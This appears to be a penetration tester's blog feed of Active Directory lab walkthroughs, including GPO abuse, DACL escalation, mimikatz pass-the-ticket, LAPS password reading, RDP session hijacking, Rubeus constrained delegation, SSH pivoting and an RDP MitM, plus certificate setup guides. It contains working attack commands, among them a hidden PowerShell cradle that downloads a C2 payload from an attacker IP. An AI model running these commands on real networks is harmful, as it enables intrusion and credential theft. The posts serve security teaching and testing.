GPO Abuse – Edit permissions misconfiguration

In this scenario we take a look at GPO Abuse, which sees domain users or a specific compromised user (Jane in this example) having edit permissions to a GPO that affects a large number of machines (ok only one in the lab!). This post is to highlight the dangers of this and walk through a proof of concept to highlight the risk. Clearly this can be deadly, it can be used to spread ransomware, malware, reverse shells and any number of settings we wish to push to computer objects affected by that GPO. As a computer policy the settings are pushed out in the context of NT Authority\ SYSTEM (the highest privilege level on a Windows system). The scenario could also be such that we have control over an Organisation Unit not just a specific GPO (i.e. creating a new GPO and linking it to that OU).

Let’s start by enumerating all the permissions for all GPOs in the current domain with PowerView:

Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}

We find that the group ‘Domain Users’ have the ability to modify the ‘Dodgy Policy’ GPO which is linked to the ‘Development’ OU which contains the ‘File1’ computer object. In bloodhound this looks like:

The misconfiguration in Group Policy Management GUI would be similar to this (or a security group or individual) in this case we have used ‘Domain Users’:

We can use the RSAT (Remote Server Administration Tools) GUI and or PowerShell modules to modify or create a new policy:

New-GPO -Name 'dodgey policy' | New-GPLink -Target 'OU=Development,OU=Servers,OU=Resources,DC=Jango,DC=com'

The actions of this attack can be wide reaching in terms of the number of affected hosts, in such a situation whilst on a penetration test it would be wise to consider limiting the target hosts of a new GPO to a couple of hosts specifically. We can do this in two ways:

1. Object level targeting by applying a WMI Filter: In the GPO setting you can target various AD or WMI objects. For example something similar to the following: MS SELECT * FROM Win32_ComputerSystem WHERE Name IS ‘FILE1’.

2. Security Filtering: Remove the default “authenticated users” and add the computer name/security group with computer objects.

Some versions of PowerView (to the best of my knowledge) contain a ‘New-GPOImmediateTask’ function, which can create a scheduled task which will run once GPO refreshes. We can push any PowerShell or CMD command such as stager, launcher or download cradle.

I wasn’t able to find the New GPOImmediateTask function in the latest version of PowerView from github however it is in this branch: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/26a0757612e5654b4f792b012ab8f10f95d391c9/Recon/PowerView.ps1

The following syntax is used:

New-GPOImmediateTask -TaskName Debugging -GPODisplayName Dodgeypolicy -CommandArguments '-NoP -NonI -W Hidden -Enc JABXAGMAPQBO…' -Force

You can remove the schtask .xml after you get execution by supplying the -Remove flag like below (this is a nice feature):

New-GPOImmediateTask -Remove -Force -GPODisplayName SecurePolicy.

I wasn’t able to get this working in my labs, however not deterred I looked for an alternative way. Alternatives being standard RSAT GUI (not very red team) and SharpGPOAbuse . SharpGPOAbuse will essentially do a very a similar job to PowerView by modifying the target GPO, which when applied to a machine will create a scheduled task which will instantly run.

First compile SharpGPOAbuse in Visual Studio (needs a write up in its own right).

Next we will use the Assembly Task from within Covenant, with the following parameters:

--AddComputerTask --TaskName "Task1" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c powershell -Sta -Nop -Window Hidden -Command iex (New-Object Net.WebClient).DownloadString('http://192.168.1.104/GruntHTTP.ps1')" --GPOName "dodgey policy"

Great, we see the commands executed successfully in our covenant output and the GPO has been updated, we can see the file that has been updated in sysvol on the DC!

If we look in Group Policy Management console on the DC we can see specifically what has been set:

Once GPO has been refreshed (every 90 mins by default) we can verify our results on the target system ‘File1’, we can see that Task1 has been applied in the Task Scheduler:

The proof is always in the pudding, and we can see a grunt has connected:

Things to consider from a pentesting perspective:

  • The impact could be significant, so verify how this affects your position. I.e. How many machines will this affect, what sort of machines critical infra?
  • An alternative route to reach your goal may have less of an impact.
  • As an alternative approach to highlight this risk to a client might be to simple demonstrate through RSAT by creating a blank GPO and linking it to the OU without creating the task or any actions.
  • To the best of my knowledge I couldn’t see a ‘remove’ or ‘reverse’ action within SharpGPOAbuse, to revert back/clean up our modifications. As a Pentester/Red Team member you should be mindful of this. Depending on the engagement I would suggest this is run in conjunction with the POC or have the ability to clean this up, both the task its created and the GPO.
  • This is not OPSEC safe, admins may see the changes in the GPO console.
  • Always remember to clear up after yourself.

Hopefully this has demonstrated how powerful and dangerous this sort of misconfiguration is in the enterprise can be. For the blue team, check your configuration with bloodhound to understand any weakness you may have.

Facebooktwitterpinterestlinkedinmail

DACL Trouble: GenericAll on OUs

Take the following scenario:

This is bit of an odd one however misconfigurations as we know happen. Our standard user Ted has GenericAll DACL permissions over the object ‘Development’ OU (Organisation Unit). We see that our target admin ‘Terry_adm’ also sits under the Development OU, however we don’t automatically have GenericAll over this account just the OU. So how do we take advantage of this privilege and abuse the GenericAll to compromise the Terry_adm account? Lets walk through a proof of concept.

Lets first take a look at this configuration in AD Users and Computers, we can see that the Principal ‘Ted’ only has full control over ‘This object only’ ie the Development OU. We will look to effectively extend this to all descendant objects as shown in the attack path in Bloodhound to get to Terry_adm :

Lets just first prove we don’t have access to the target admin account terry_adm by trying to reset its password:

OK fine, we don’t have access to change Terry_adm password.

Next we will need the Development OU GUID, we can use PowerView for this or get it from Bloodhound:

Once we have this we can build the ACE on the development OU object, to allow us to have access to all descendant objects of the OU. The below is a one liner, remember to change both the ‘PrincipalIdentity’ value to the username who has GenericAll permission and also the GUID of the OU (read through the below and try to understand what its doing):

$Guids = Get-DomainGUIDMap; $AllObjectPropertyGuid = $Guids.GetEnumerator() | Where-Object {$_.value -eq 'All'} | Select -ExpandProperty name; $ACE = New-ADObjectAccessControlEntry -Verbose -PrincipalIdentity Ted -Right GenericAll -AccessControlType Allow -InheritanceType All -InheritedObjectType $AllObjectPropertyGuid; $OU = Get-DomainOU -Raw '3346827a-1a03-4345-99da-c991532481cf'; $DsEntry = $OU.GetDirectoryEntry(); $dsEntry.PsBase.Options.SecurityMasks = 'Dacl'; $dsEntry.PsBase.ObjectSecurity.AddAccessRule($ACE); $dsEntry.PsBase.CommitChanges()

If we then wait a few minutes and then try to reset Terry_adm password to prove we now have GenericAll all against descendant objects of the OU we get:

Nice.

Lets quickly take a look in the backend and review the DACL in AD Users and Computers for the Development OU:

Very nice, we can now see we have the ‘This object and all descendant objects’ applied. Remember you will need to reverse your actions as a tester.

The same process can be applied to computer objects, once the ACE is created follow the ‘Resource-based Constrained Delegation: Attack Path’ for computer take over.

Big thanks to SpecterOps who demonstrate the process here.

Facebooktwitterpinterestlinkedinmail

Pass the Ticket: PTH

Take the following scenario, you have local admin rights on a server and have identified a high value target that has a session logged in, where do you go from here? From the Bloodhound screenshot below we can see that Bob_adm has a session on web1.

Lets explore compromising the bob-adm session. First we’ll log in to web1 dump the ticket using mimikatz and the reuse it to impersonate that user.

First we will Load mimikatz in a high integrity session and run up “privilege::debug” “sekurlsa::tickets /export”

This will export a bunch of tickets into the directory where you ran mimikatz from and will look similar to this:

Notice the differences in the tickets we can see some are Ticket Granting Tickets (TGT) which have been used to gain Ticket Granting Service (TGS) for specific services such as ldap, cifs etc. The ticket we are interested in is the krbtgt.

Next we will use mimikatz to inject one of the kirbi files into our own session:

kerberos::ptt[0;141473]-2-0-40e10000-bob_adm@krbtgt-JANGO.COM.kirbi

If we check the ticket we can see the following in mimikatz:

And then in windows with klist:

Then finally to impersonate bob_adm we will test our newly crafted ticket by browsing to the C$ or the domain controller:

Nice.

Facebooktwitterpinterestlinkedinmail

LAPS ms-Mcs-AdmPwd enumeration/attack vector

Take the following scenario, we have compromised Ted’s account, we identify he has LAPS read permissions to a few boxes, how do we go about taking advantage of that from the Red Team attack perspective? Well its pretty straight forward with no catches, we just read the AD ms-Mcs-AdmPwd attribute from the computer object.

ReadLAPSPassword

In this case our compromised user has the ability to read the ‘ms-Mcs-AdmPwd’ LAPS attribute on SQL1 which is the password field for the local administrators account. With the right tools ted can read this attribute, we will use PowerView.

Import PowerView (in this instance I’m using Covenant the .NET command and control framework):

Using PowerView to read the ms-mcs-AdmPwd attribute
Get-DomainObject SQL1.Jango.com -Properties "ms-mcs-AdmPwd",name

If we look at the attribute editor in AD Users and Computers for the SQL1 account we can see this aligns:

Showing the ms-Mcs-AdmPwd AD computer object attribute.

Easy!

Note: The moral of this story, ensure the principle of least privilege is followed, ask yourself was Ted supposed to be in that group. I’ve written about the benefits of LAPS here and here, however careful configuration is required. Ensure you LAPS permissions are in check.

Facebooktwitterpinterestlinkedinmail

Stealing RDP Sessions

Take the following scenario, you compromise a box through a Kerberoastable SPN, which just so happens to be a SQL account which has been added to the local administrators group on the SQL server (very common scenario). Also logged into the server via RDP is another admin. We can effectively take over this session through Microsoft native tooling using Remote Desktop Services: Session Shadowing:

You RDP in and enumerate the logged on sessions with ‘query user’.

We can see that bob-adm is also logged on and is in an ‘Active’ session, now this is a very risky maneuver and should really be considered as a last resort as it will effectively take over the other users session. If you try to connect to the users session through task manager like below you will be prompted for a password:

However the key thing here is that you don’t need the users password if you run the process as local SYSTEM.

We can achieve this simply in two ways:

Create a simple service like below in the context as local SYSTEM:

sc create rdptakeover binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#1"

Looking at the service in more detail it is in fact created to run as local SYSTEM:

We can then just start the service with:

sc start rdptakeover

The RDP session that your currently logged in with will literally switch over to the other session instantly.

The same process can be achieved with mimikatz as below:

The commands being:

privilege::debug
token::elevate
ts::sessions
ts::remote /id:2

One way we can reduce the impact of this is to use group policy to remove disconnected remote sessions, we do this with the following policy:

Administrative Templates / Windows Components / Remote Desktop Services / Remote Desktop Session Host / Session Time Limits
Facebooktwitterpinterestlinkedinmail

Active Directory Resource-based Constrained Delegation: Attack Path

Take the following scenario:

Our standard user Ted has GenericAll writes over file1.jango.com. However, how do we take advantage of this privilege, first lets just prove we don’t have access to the target server:

We will need the following info (track this as you go):

Target Computer Name: file1.jango.com
Admin on Target Computer: administrator
Fake Computer Name: fakecomputer
Fake Computer Sid: S-1-5-21-759278571-4292840072-3113789661-1116
Fake Computer Password: Password1

Using PowerMad we can create a fake computer system, any domain user can do this in the domain:

import-module PowerMad.ps1

New-MachineAccount -MachineAccount fakecomputer -Password $(ConvertTo-SecureString 'Password1' -AsPlainText -Force)

Get the SID for the new fakecomputer object with PowerView:

Get-DomainComputer fakecomputer -Properties objectsid | Select -Expand objectsid

Next, build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE:

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-759278571-4292840072-3113789661-1119)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); 
Get-DomainComputer file1 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

No output will be generated for this, so to verify this has worked run the following:

$RawBytes = Get-DomainComputer file1 -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity; $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0; $Descriptor.DiscretionaryAcl

We can see that the ACE has been built:

NOTE: This will modify the ‘msds-allowedtoactonbehalfofotheridentity’ of the target computer system!!!!!!!

Now our our new machine fakecomputer is trusted by by file1 we can forge a ticket with Rubeus:

First we need the rc4_hmac (ntlm):

Rubeus hash /password:Summer2018! /user:fakecomputer /domain:jango.com

The we can craft the ticket:

Rubeus s4u /user:fakecomputer$ /rc4:64F12CDDAA88057E06A81B54E73B949B /impersonateuser:bob_adm /msdsspn:cifs/file1.jango.com /ptt

Verify we can now access the C:\ drive of the target machine. NOTE: the above ticket has been crafted specifically for access to the target machine for that service ONLY:

We can also verify by looking at the tickets with built in klist and then Rubeus:

Finally to cleanup the modified AD object and clear the ‘msds-allowedtoactonbehalfofotheridentity’ attribute with PowerView:

Get-DomainComputer file1 | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'

Thanks to both harmj0y and wald0 for these excellent posts on the subject:

https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/

https://www.youtube.com/watch?v=RUbADHcBLKg

Facebooktwitterpinterestlinkedinmail

PowerShell History and Aliases

PowerShell history is session based by default, however, your long term history is available here:
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

To make this a little more accessible we will create a profile script that gets executed every time you fire up PowerShell and an alias for the above type $env.. command:

First we will create the profile script in our profile under: C:\users\adam\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Then in you favourite PowerShell editor we will add our alias to the Microsoft.PowerShell_profile.ps1 file in the form of a simple function:

function historyfunc{
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
}
Set-Alias extra-history historyfunc

Now you can just run ‘extra-history’ you may need to adjust your script execution policy as every time a session runs it will want to run your .ps1 script. Enjoy!


Facebooktwitterpinterestlinkedinmail

Networking Pivoting via SSH – Scanning with Nessus Professional behind a Firewall or NAT.

In this post I’m going to be covering the process to scan a network behind a Firewall or NAT using Networking Pivoting via SSH without being limited to proxychains, specific ports and protocols. Essentially this will use SSH tunneling, virtual tap adapters, some routing and masquarding in IPtables. The beauty of this method is the prerequisites are very low, for the most part no additional packages or standalone tools are required, we can use what is shipped with most Linux builds.

There are many use cases for this, scanning an internal network without being on prem, cloud environments, various pentesting scenarios, which can often be the stumbling point once a shell has been landed. Traditionally this type of task would have been done with the use of proxy chains, through some form of shell access via a netcat listener, Metasploit or SSH dynamic port forward, which I have previous walked through here. However this is an extremely slow method and rely’s on being able to tunnel through a single port with proxy chains, I have never had any luck scanning with more complex tools like Nessus in this way. Full SYN scans (-sT) with nmap great, Nessus not so much.

Lets take the following scenario and set the pivot up:

Networking Pivoting via SSH

We can use tunctl or ip tuntap, the difference being that ip tuntap is part of the iptools suite and therefore general supported on most Linux operating systems. Tunctl can usually be downloaded from your repo of choice ie with Ubuntu its part of the apt repository. In this example we will be working with Kali as the scanning system and a Ubuntu server as the pivot point, which has SSH accessible. (It is worth mentioning at this point it doesn’t matter which end the SSH connection is initiated from).

First we need to create a virtual tunnel and therefore need to create two virtual interfaces at both ends of the tunnel. For this we are going to use a tap interface. For reference a tap interface operates at layer 2 and a tun interface operates at layer 3.

Using tunctl: First we will need to install tunctl with apt install uml-utilities

# apt install uml-utilities

Create the virtual tap interface with the following command:

# tunctl -t tap0

Using ip tuntap: First verify your ip tools version installed supports tuntap, type ‘ip’ you will see if the command is available:

# ip

Create the virtual tap interface with the following command:

# ip tuntap add dev tap0 mod tap

Once this is setup assign it an ip address and raise the interface, assign a different address for each end of the tunnel:

So on the scanner:

# ip a a 10.100.100.100/24 dev tap0 && ip link set tap0 up

On the pivot server:

# ip a a 10.100.100.101/24 dev tap0 && ip link set tap0 up

On each end of the tunnel we will also need to make sure our SSH config will allow us to tunnel. Lets modify our /etc/ssh/sshd_config file by adding ‘ PermitTunnel=yes ‘ to the end and restart the service. More about this option can be found in SSH man page here.

Now for the magic, lets bring the tunnel up by establishing an SSH session, this will need to be done with a privileged account:

ssh -o Tunnel=ethernet -w 0:0 root@11.1.1.11

Lets cover off these options:

  • -o = allows us to specify options
  • Tunnel=ethernet = is our option for the tunnel
  • -w 0:0 = specifies the next available interface for the tunnel, and corresponds to each side of the tunnel.

Next lets take a moment to verify our tunnel is up with a couple of quick checks:

First verify the link is up with ethtool:

# ethtool tap0

You will notice the link is up, try this without the connection you will find the link is down.

Second verify you can ping the other end of the tunnel:

# ping 10.100.100.101

Again disconnect your SSH connection and watch icmp response drop.

Next in order to get our traffic to our destination servers/subnet we are going to need some routes adding to Kali to tell the system where to send the traffic, ie the other end of the tunnel, so, something similar to this where 192.168.1.0/24 being the network you are targeting:

# ip route add 192.168.1.0/24 via 10.100.100.101

# ip route add 192.168.2.0/24 via 10.100.100.101

Finally we need to setup some iptables rules and turn our pivot point into a router by enabling IPv4 forwarding:

# echo 1 > /proc/sys/net/ipv4/ip_forward

# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# iptables -t nat -A POSTROUTING -o tap0 -j MASQUERADE

# iptables -A INPUT -i eth0 -m state –state RELATED,ESTABLISHED -j ACCEPT

# iptables -A INPUT -i tap0 -m state –state RELATED,ESTABLISHED -j ACCEPT

# iptables -A FORWARD -j ACCEPT

At this point the pivot should be up and running, test this by doing some basic checks with a known host on your target network.

Happy pivoting testers!

Facebooktwitterpinterestlinkedinmail

Self Signed Certificates + Remote Desktop Protocol = MiTM and Creds – This is a problem, don’t ignore it!

In this post I am going to highlight the risks of using self signed certificates with Remote Desktop Protocol (RDP). Why its a problem and what we can do to fix it! Hopeful by demonstrating the impact it will raise awareness of how serious an issue this can actually be.

On an internal network the issue stems from you connect to a computer or server that is using a self signed certificate through remote desktop your not  able to verify the endpoint for its authenticity. ie it is who it says it is.

Unfortunately we are all too familiar with the classic rdp certificate warning prompt like this and most of the time blindly click on yes I accept. Often with out actually reading what the message is saying.

Ok, lets see what all the fuss is about then. Lets consider the following devices in our LAB

DC16: 192.168.1.10 – Windows Server 2016 Domain Controller

WEB16: 191.168.1.52 – Windows Server 2016 Web Server

W10 192.168.1.51 – Windows 10 Client

Kali  192.168.1.50 – Kali Linux our attacker.

The attacker can essentially sit on the same network and cause a Man In The Middle (MiTM) condition between the windows 10 client and Web Server when using self-signed certificate. If we expand on the scenario slightly. Imagine we have an admin logged in to our windows 10 client, he/she wants to investigate an issue on the web server, so goes to establish a remote desktop session to the server. Lets consider what can happen.

To demonstrate this attack we are going to use ‘Seth’ a tool to perform a MitM attack and extract clear text credentials from RDP connections. Code is located here: https://github.com/SySS-Research/Seth , you can find a more detailed talk about the tool here by its creator Adrian Vollmer https://www.youtube.com/watch?v=wdPkY7gykf4.

On our attacking machine we are going to start Seth:

Mean while our admin is going about his daily tasks on our windows 10 client, he/she then decides to connect to our web server via RDP:

The usual connection sequence takes place, the admin receives the usual all too familiar warning box and continues to establish the connection. In the meanwhile over on our attacking box the connection has been intercepted and the MiTM attack carried out successfully. Seth intercepts the connection and has captured the NTLMv2 hash as well as the clear text credentials. Oh dear.

As you can see this not an optimal configuration, and one which  we would very much like to avoid. It can be avoided by using a signed certificate from your internal CA or other trusted certificate authority. Getting certificates installed on your devices isn’t all that too difficult to go through, I actually discuss this further here and linked to how to. In addition to this we can also stop our clients from connecting to anything we don’t trust via GPO. Remember we need to be connecting to our servers via name not IP. As the IP address is not what is on the certificate in the common name field and will therefore be untrusted.

Well I hope this has helped demonstrate the impact of self-signed certificates and why they should be addressed on the inside.Facebooktwitterpinterestlinkedinmail

Generating a certificate for a non-domain joined device using an internal AD CA – ie pfsense

I thought I would walk through the process of generating a certificate for a non-domain joined device using an internal Active Directory Certificate Authority (AD CS). In this example, it is going to be for our web GUI for a pfsense firewall. I’v talked before about the challenges of self signed certificates in this post, so thought this would be useful to further demonstrate how this can be done for other devices that are not joined to a domain. Like most things if you have never experienced setting something like this up, you won’t necessarily know how to go about doing it. This post aims to fill that gap. Hopefully you will see this isn’t as difficult as it sounds.

For our lab we have AD CS setup and pfsense on the same network, its actually acting as the gateway for the network. Its a key piece of equipment on the network that we want technical security assurance around. Including being able to validate that when we connect to the device for management it is who we think it is, and importantly who its saying it is. And that we are not in a position to let ourselves be caught by a man in the middle attack!

Lets start on the pfsense web configurator page:

As we can see this is using a self signed certificate and is therefore untrusted. So we want a certificate on our firewall that is signed by a trusted certificate authority, one that is ideally already in our root certificate store. If you have an internal AD CS, the root CA certificate will most likely be already there.

Typically with a network device such as this we somehow want to first generate a Certificate Signing Request (CSR) to then take to our CA to be signed. You can usually achieve this via a shell session to the device or through the web GUI in most cases. Whilst the steps i’m going through with pfsense are specific to this device, the concept is the same for all devices. With pfsense we are able to do this here:

We can see in the above screen shot the self-signed certificate that comes with the device. To start the process we click on the green button at the bottom Add/Sign. As you can see below the method we want to use is ‘Create a Certificate Signing Request’.

Continue down the page adding all the relevant info. Three key areas to take note are the ‘Common Name’, ‘Alternative Names’ and selecting Server Certificate for the certificate type. These are important as you this is how we will identify the authenticity of the device. The ‘Comman Name’ is effectively its short name, and the ‘Alternative Names’ we will want to add as the Fully-Qualified-Domain-Name (FQDN). In this case I’m naming the firewall FW1, Jango.com is the domain name 🙂 .

Once at the end of the page select save and you should see our certificate request in a pending state, the screen should look like this:

Next export the CSR, download it to your local machine and open it in notepad. Highlight the text and copy it to your clipboard for later. The file should look like this:

Next we are going to find our way to the AD CS certificate enrollment web page. This is commonly the CA name followed by ‘certsrv/default.asp’ so in my lab the CA is held on the DC, so will be http://DC16/certsrv/default.asp, just like below:

Next we select ‘Request a certificate’:

Here we don’t have many options as this is a fairly default install of the certificate services however select ‘Advanced Certificate Request. On the next screen as below, paste in the CSR in the request window, and select the default ‘Web Server’ template from the ‘Certificate Template’ drop down menu and click submit:

Next we have the opportunity to download the signed certificate in various formats.

In this instance we are going to download the certificate in Base 64 encoded format . Open up the certificate file in notepad, highlight the contents and save it to the clipboard, it should look like this:

Next we go back to the pfsense web GUI, and complete the certificate signing request from the certificate page. This is under ‘System’ –> Certificate Manager’ –> ‘Certificates’. We do this by selecting the update CSR button, paste in the contents of the certificate into the ‘Final Certificate data’ like below and select ‘update’:

The certificate will be loaded and will look like this:

As we can see from the above screenshot our subject Alternate Names are listed as FW1 and FW1.jango.com, meaning when we access the page with these names the connection will be validated correctly. As opposed to accessing it via IP address and it will warn us that the browser has not been able to validate the endpoint and is therefore insecure.

Next change how the certificate is used. Essentially we are binding it to port 443, the web GUI itself, we do this in System –> Advanced –> Admin Access, select the descriptive name we gave it earlier and select ‘Save’ at the bottom of the page:

Next reload the web GUI page using your common name or subject alternate name. At this point bear in mind you mostly likely will need a manual DNS entry for FW1. So head over to the DNS console and quickly create one. Once you have done that reload the pfsense web GUI, and hey presto!

and..

Now we have a certificate signed by our internal AD CA and can verify what we are connecting to is actually correct.

I hope this has helped demystify the process of obtaining an internally signed certificate from our AD CA for our weird and wonderful network devices that we have on the network.Facebooktwitterpinterestlinkedinmail